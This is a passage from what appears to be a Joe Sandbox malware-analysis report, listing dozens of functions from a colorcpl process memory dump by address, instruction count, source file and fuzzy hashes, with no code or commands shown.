                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 0b4e63a3af2f36388c19bb01a8158bbf85eee50dbe01f6888877beb839016758
                                                                                                                                          • Instruction ID: 67853917e891bc2315cdcc127f96376ccc66c5eff7ccb0ce836d24c7871f25cc
                                                                                                                                          • Opcode Fuzzy Hash: 0b4e63a3af2f36388c19bb01a8158bbf85eee50dbe01f6888877beb839016758
                                                                                                                                          • Instruction Fuzzy Hash: 89018B32209784DFD3238719CB48F267BE8EF89794F1904A1F904CB6A2D639DD40CA61
                                                                                                                                          Function 227CEB50 Relevance: .0, Instructions: 46COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 2994545307-0
                                                                                                                                          • Opcode ID: 34ac43544915eec42608dfbffeaec85dbc0fe431fae527b1824bf275e65f9546
                                                                                                                                          • Instruction ID: a01a5c153c6c9eb42183cba7c7c6ad70cdcd63b3462fdbbe76abb93c90ce835d
                                                                                                                                          • Opcode Fuzzy Hash: 34ac43544915eec42608dfbffeaec85dbc0fe431fae527b1824bf275e65f9546
                                                                                                                                          • Instruction Fuzzy Hash: 9F01A271288700AFD3234F26C940F12BBE8DF65B64F15082AB6069F3D0D6F1E840CB54
                                                                                                                                          Function 22722582 Relevance: .0, Instructions: 45COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: e27e52f4393af687b18e09b2a7f56a66b6188a4f63950db1032c0c6c998280a3
                                                                                                                                          • Instruction ID: 9ce11976e82d9f963227e50ba43ff83b737217963a192ec7fa87f6406e16fe92
                                                                                                                                          • Opcode Fuzzy Hash: e27e52f4393af687b18e09b2a7f56a66b6188a4f63950db1032c0c6c998280a3
                                                                                                                                          • Instruction Fuzzy Hash: BCF0F433745B20B7C7328B578D54F077FADEB94B90F008168F6049B640CA70DD01CAA0
                                                                                                                                          Function 227F625D Relevance: .0, Instructions: 43COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: d626618199ba3df53be6943fd051c04ba9aabec046ccb75882e644cd133185b6
                                                                                                                                          • Instruction ID: 4c0c40fb1c0140176be5dc054aa030b71713be7701c10da2d25e4374d331739b
                                                                                                                                          • Opcode Fuzzy Hash: d626618199ba3df53be6943fd051c04ba9aabec046ccb75882e644cd133185b6
                                                                                                                                          • Instruction Fuzzy Hash: A6017C71A14309ABCB04DFA9D455AAEB7F8EF58304F10402AF910EB391D674EA00CBA0
                                                                                                                                          Function 227F62D6 Relevance: .0, Instructions: 43COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 0d49feef7532ee908058ddbeecf96904767785056b5c47f39a6b6b7843a782c4
                                                                                                                                          • Instruction ID: d1ad7f2e9192d18d7b47feb85e849d6f261dae1942ee65cdcf246d22f3f26f63
                                                                                                                                          • Opcode Fuzzy Hash: 0d49feef7532ee908058ddbeecf96904767785056b5c47f39a6b6b7843a782c4
                                                                                                                                          • Instruction Fuzzy Hash: 92017C71A04309ABCB00CFA9D445AAEB7F8EF58304F50402AF910EB390D6749A00CBA0
                                                                                                                                          Function 227F634F Relevance: .0, Instructions: 43COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: f5f06a37ca11a47e81e7cec8cbacf32100a911509aa6e9204707d475269beedc
                                                                                                                                          • Instruction ID: 33935c339f65116b66b932b1f076b5a20b896bc0d3dc51e631886cb49b58bd2f
                                                                                                                                          • Opcode Fuzzy Hash: f5f06a37ca11a47e81e7cec8cbacf32100a911509aa6e9204707d475269beedc
                                                                                                                                          • Instruction Fuzzy Hash: E7012C75A14309ABCB05CFA9D555AAEB7F8EF58704F10406AF914EB390D674DA01CBA0
                                                                                                                                          Function 2271C310 Relevance: .0, Instructions: 43COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 256e141dc6b9705f9909cc47be5080ee0eb4db29c7708f1459163a76593eb05a
                                                                                                                                          • Instruction ID: 30439ec42afb7bf18a43bd07c904fb7bf5922974dd0474a74141d650c14367c4
                                                                                                                                          • Opcode Fuzzy Hash: 256e141dc6b9705f9909cc47be5080ee0eb4db29c7708f1459163a76593eb05a
                                                                                                                                          • Instruction Fuzzy Hash: CBF0C23320DB229BD7230AD94844F1B6AA98FD5B64F160039E308AB640CA648C02B6D7
                                                                                                                                          Function 2274C073 Relevance: .0, Instructions: 43COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 65a6da88ffe4e3ef4f4bf4dda68b508183db8c002971e90ba11f3763248cd9ea
                                                                                                                                          • Instruction ID: ed3631dd810ed38acbe64f01f907d39688647a399f647b44c9f5359f2cc81b7c
                                                                                                                                          • Opcode Fuzzy Hash: 65a6da88ffe4e3ef4f4bf4dda68b508183db8c002971e90ba11f3763248cd9ea
                                                                                                                                          • Instruction Fuzzy Hash: 98F0C2B2A00711ABD329CF4DDD40E67B7FADBD4B80F048168A505CB220EA31ED04CB90
                                                                                                                                          Function 2275CA6F Relevance: .0, Instructions: 42COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 6225b3f56bb7e4a8823ac3bf287c1186c08f5b75335344108ff231fc305a603f
                                                                                                                                          • Instruction ID: ec9502ac7c51cb575425694db662b88fe6475008a0efee047de7e1fdc740da67
                                                                                                                                          • Opcode Fuzzy Hash: 6225b3f56bb7e4a8823ac3bf287c1186c08f5b75335344108ff231fc305a603f
                                                                                                                                          • Instruction Fuzzy Hash: AE01F4322087849BD3238B19D909F49BFD8EF82754F4841A5FE04DF6A2D679C910C254
                                                                                                                                          Function 227A63C0 Relevance: .0, Instructions: 41COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: dbb06fbea8421d8b96890fd2b120b20d820a8046168cc589f8d54c87f08ef009
                                                                                                                                          • Instruction ID: 09ab52269bc93120cd80328191df22a01f98e5a9c31916a5c04927ee8b5be006
                                                                                                                                          • Opcode Fuzzy Hash: dbb06fbea8421d8b96890fd2b120b20d820a8046168cc589f8d54c87f08ef009
                                                                                                                                          • Instruction Fuzzy Hash: D0F01D7220421DBFEF029F94DD80DAF7B7DEB593A8B104225FA1196160D635DE21ABA0
                                                                                                                                          Function 227F61E5 Relevance: .0, Instructions: 41COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 8a8442e51d16bbdeceabcc03e472521bcf666aafcfb9b16953ce8b25470d56ad
                                                                                                                                          • Instruction ID: d2138ce20eb71c3fd67443566635d32df1f63a23bcccd9a17289e7398f09fa48
                                                                                                                                          • Opcode Fuzzy Hash: 8a8442e51d16bbdeceabcc03e472521bcf666aafcfb9b16953ce8b25470d56ad
                                                                                                                                          • Instruction Fuzzy Hash: 75018F71A043489BCB01CFA9D445AEEB7F8AF58314F14005AF900EB380D734EA01CBA4
                                                                                                                                          Function 227AA4B0 Relevance: .0, Instructions: 40COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 5e850303809fa347ce25b6f8123586570fb5f3e9cef3bad4135bd2445be710ba
                                                                                                                                          • Instruction ID: 639bc63ba37bda65bb98994967dc952b3ef7845a78539cda8ab56e29c80b85e0
                                                                                                                                          • Opcode Fuzzy Hash: 5e850303809fa347ce25b6f8123586570fb5f3e9cef3bad4135bd2445be710ba
                                                                                                                                          • Instruction Fuzzy Hash: 62019736104219ABCF128F84CD40ECE3FB6FB4C764F068201FE19A6260C23AD970EB81
                                                                                                                                          Function 2271C0F0 Relevance: .0, Instructions: 39COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: db3a23a18be2168f01f66661a257c7fe1d572f2c3c37f77d740a085c8778036a
                                                                                                                                          • Instruction ID: 910a77e67f6a3007b473f323d86dabfae7f4e89a560b1091d2b21f1d8d5b17e3
                                                                                                                                          • Opcode Fuzzy Hash: db3a23a18be2168f01f66661a257c7fe1d572f2c3c37f77d740a085c8778036a
                                                                                                                                          • Instruction Fuzzy Hash: F8F02BB228C3015BF70185558E41F5233A5EFE0751F65802DEB058F2C1EE70DC01E3A6
                                                                                                                                          Function 2275656A Relevance: .0, Instructions: 39COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 78cd1d5c65a33406fdb5efcbfbc487befaef11d84f8aa186e29e96e68f67417d
                                                                                                                                          • Instruction ID: c12136281663e3f44271e15bd8f37ee91195b98e10a80d3b5c5666932d5bb891
                                                                                                                                          • Opcode Fuzzy Hash: 78cd1d5c65a33406fdb5efcbfbc487befaef11d84f8aa186e29e96e68f67417d
                                                                                                                                          • Instruction Fuzzy Hash: 0901A47028C7849BE3138B38DE68F1573E4AB40B44F9406A0FE01EB6D6D76CD511C210
                                                                                                                                          Function 227C437C Relevance: .0, Instructions: 37COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: abe8a162c34942eaba6aef332befd3f6f0562530e07f378f59fd36a18add1061
                                                                                                                                          • Instruction ID: c5c19c61eabc5fa7b8a2f027fe315c35ace8760df49ffb195b71c50e1aa9d6cf
                                                                                                                                          • Opcode Fuzzy Hash: abe8a162c34942eaba6aef332befd3f6f0562530e07f378f59fd36a18add1061
                                                                                                                                          • Instruction Fuzzy Hash: A3F0BE3234AB1247DB269E3AA934B2AA695AFE0B10F01073C9A01AB680DF20D800C790
                                                                                                                                          Function 227AE872 Relevance: .0, Instructions: 36COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 6168c74df7881035f69970a17cdbc8bbd68c52d06f01b9a11dec5043249d3eba
                                                                                                                                          • Instruction ID: aabd3332378c94c69397425b37ade14c43b6487baaf469631378b3a54d70917b
                                                                                                                                          • Opcode Fuzzy Hash: 6168c74df7881035f69970a17cdbc8bbd68c52d06f01b9a11dec5043249d3eba
                                                                                                                                          • Instruction Fuzzy Hash: EBF0E23370A7119BC3228A49CDA1F0673A8EFD5A70F560274A644AF260C360EC41CBD0
                                                                                                                                          Function 227AC89D Relevance: .0, Instructions: 36COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 14574b4de7d79edc10b8ed12fd27207bfe134775c9b236117870c5004a75055f
                                                                                                                                          • Instruction ID: 36cdaa260b6722ef405da026fef7917b10761e8d756fb95e84c09c919e6a5555
                                                                                                                                          • Opcode Fuzzy Hash: 14574b4de7d79edc10b8ed12fd27207bfe134775c9b236117870c5004a75055f
                                                                                                                                          • Instruction Fuzzy Hash: D3F0AF706193049FC310EF28C556E2AB7E4FF98714F40465EBC98DB394E638E900C796
                                                                                                                                          Function 22750854 Relevance: .0, Instructions: 35COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 4cdcb84ab97496671339d5fdb647af6bc44589d2c26ee95e7ea7cdc637936955
                                                                                                                                          • Instruction ID: f7eb007f32d8c037cee79bd34eb504429ed126b362568155c16bcfea30c53812
                                                                                                                                          • Opcode Fuzzy Hash: 4cdcb84ab97496671339d5fdb647af6bc44589d2c26ee95e7ea7cdc637936955
                                                                                                                                          • Instruction Fuzzy Hash: 1EF0B472614304AFE715CB25CD06F46B7E9EF9C354F1480789944D7160FAB4ED21D654
                                                                                                                                          Function 227AC912 Relevance: .0, Instructions: 34COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 15cb060d4e9bacead743f29c5b8554d44f4b5bbb8d6d3a8aba3281ad8cc9f144
                                                                                                                                          • Instruction ID: 77cb90cfc9b0f9335c82b39e6dc44c49cad3e0b023250f397b487444bb2ed343
                                                                                                                                          • Opcode Fuzzy Hash: 15cb060d4e9bacead743f29c5b8554d44f4b5bbb8d6d3a8aba3281ad8cc9f144
                                                                                                                                          • Instruction Fuzzy Hash: A6F04F70A0534DAFCB05DF69C525EAEB7B4EF58304F008169B955EB385DA38EA05CB90
                                                                                                                                          Function 227247FB Relevance: .0, Instructions: 33COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: d55db16a3a19451d527beffefd5453f97dc77197dbe53b78efc652780fff4196
                                                                                                                                          • Instruction ID: 4bd6ed13660091d9357a0b9e08fca484d1b60ec8689706297e8da01835a207f5
                                                                                                                                          • Opcode Fuzzy Hash: d55db16a3a19451d527beffefd5453f97dc77197dbe53b78efc652780fff4196
                                                                                                                                          • Instruction Fuzzy Hash: 7EF0BE3293EFE09FD312CB68C275F427BD49B00764F058BBAD98987512C734D980C651
                                                                                                                                          Function 227E0115 Relevance: .0, Instructions: 32COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: ba9ac0c1101adcbc7ea54e0b7073a21d3745a91e9fb0bf85a817a5b3d9022c16
                                                                                                                                          • Instruction ID: 122c3cb93d7e9b20d18098772b5966beefc41eee01874ee4c3db06c4a710b824
                                                                                                                                          • Opcode Fuzzy Hash: ba9ac0c1101adcbc7ea54e0b7073a21d3745a91e9fb0bf85a817a5b3d9022c16
                                                                                                                                          • Instruction Fuzzy Hash: A8F05CAB41E7D047CB124B3476983C93B649743210F0A1849DCEB7F28AC678C983C230
                                                                                                                                          Function 22762619 Relevance: .0, Instructions: 31COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 6c7572fa5744a55e43c142e8942155ae64e2404789e34097860efd8d5a2ca0e7
                                                                                                                                          • Instruction ID: 7eb62f96eb53cae65023e96301210f4957ca08c1d5f07f8ac332b50b354a09d3
                                                                                                                                          • Opcode Fuzzy Hash: 6c7572fa5744a55e43c142e8942155ae64e2404789e34097860efd8d5a2ca0e7
                                                                                                                                          • Instruction Fuzzy Hash: F1E0D8323447006BD7138E598CC4F6777AEDFE6B10F000079B9046F252C9E2DC0983A4
                                                                                                                                          Function 2275C5ED Relevance: .0, Instructions: 31COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: eb9e2431d708edc02523fc6dd32bf81de82251f19e4625b7b085e1fe3a7d49aa
                                                                                                                                          • Instruction ID: 5bc972928e7c7fdfc2f0049d73a9c3e7abe67e6b14e9499b6b338e8f3c4f01c0
                                                                                                                                          • Opcode Fuzzy Hash: eb9e2431d708edc02523fc6dd32bf81de82251f19e4625b7b085e1fe3a7d49aa
                                                                                                                                          • Instruction Fuzzy Hash: 51F0277551E7549FC312CB14C344F41F3D4EB00BA4F05956DDD05C7513C360CAA0CA91
                                                                                                                                          Function 227B6030 Relevance: .0, Instructions: 29COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 2f21787fc4cf88bc2024fb188b518997cea13084236808dfde9be923dffdf6d3
                                                                                                                                          • Instruction ID: 384e08580e08e765b762b1992fcbafcab3776c5ddbd67c331409e213064f84ec
                                                                                                                                          • Opcode Fuzzy Hash: 2f21787fc4cf88bc2024fb188b518997cea13084236808dfde9be923dffdf6d3
                                                                                                                                          • Instruction Fuzzy Hash: BEF030721483049FE3118F06D984F52B7E8EB05364F41C025E7089B561D379EC40CBA4
                                                                                                                                          Function 22720710 Relevance: .0, Instructions: 28COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 09d204908d37cdfbcfc5d4a721560e7c3d6986de64c378e18d154b12347e5c6c
                                                                                                                                          • Instruction ID: 60fcc3889a32bb0a1de20765740e3acc0b0502d107e6e208ac75119d7fefabea
                                                                                                                                          • Opcode Fuzzy Hash: 09d204908d37cdfbcfc5d4a721560e7c3d6986de64c378e18d154b12347e5c6c
                                                                                                                                          • Instruction Fuzzy Hash: 01F0E53A20CB459BDB06CF16D040E857BE4EB51350F000194F8418F312D735E981CF90
                                                                                                                                          Function 227549D0 Relevance: .0, Instructions: 28COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: f1b670d1cf9650df618e53f56da6216e466ca8c332a8d3f17e7fbf4f9511b07c
                                                                                                                                          • Instruction ID: 02b09e90d7acde4877f595da3ee896e92be0b33aecafe83cc54562969c4bed45
                                                                                                                                          • Opcode Fuzzy Hash: f1b670d1cf9650df618e53f56da6216e466ca8c332a8d3f17e7fbf4f9511b07c
                                                                                                                                          • Instruction Fuzzy Hash: 13E0923224C344ABD3625F658818F56B7A5ABD47A0F510439FA08AB150DB70DC50E79C
                                                                                                                                          Function 227F4164 Relevance: .0, Instructions: 27COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 1134af1017838bc7dcd79fc992dfca41226c3eadeb75b54ae722daccbff2799b
                                                                                                                                          • Instruction ID: 32808e40eef00aa56580f904f8d9ef930976378f46a70d3f5278f70b1f9c9acd
                                                                                                                                          • Opcode Fuzzy Hash: 1134af1017838bc7dcd79fc992dfca41226c3eadeb75b54ae722daccbff2799b
                                                                                                                                          • Instruction Fuzzy Hash: 93F0923292EB918FE362C728EBA4F4673E5BF10734F160AB4D50597B22D724ED80C650
                                                                                                                                          Function 227C678E Relevance: .0, Instructions: 27COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 9c57e87189bc66aa7caf2535f5315d36853ca328742cb6eaba8c93c68780cd6a
                                                                                                                                          • Instruction ID: 833665c84b11364390b37d83e0badf7b3bc68acc00679fc1205c6ad1c580997c
                                                                                                                                          • Opcode Fuzzy Hash: 9c57e87189bc66aa7caf2535f5315d36853ca328742cb6eaba8c93c68780cd6a
                                                                                                                                          • Instruction Fuzzy Hash: 1CE0DF32A40310BBDB228BA98E45F9ABAACDF94FA4F010064BB00EB090D530DE10D690
                                                                                                                                          Function 227F08C0 Relevance: .0, Instructions: 25COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
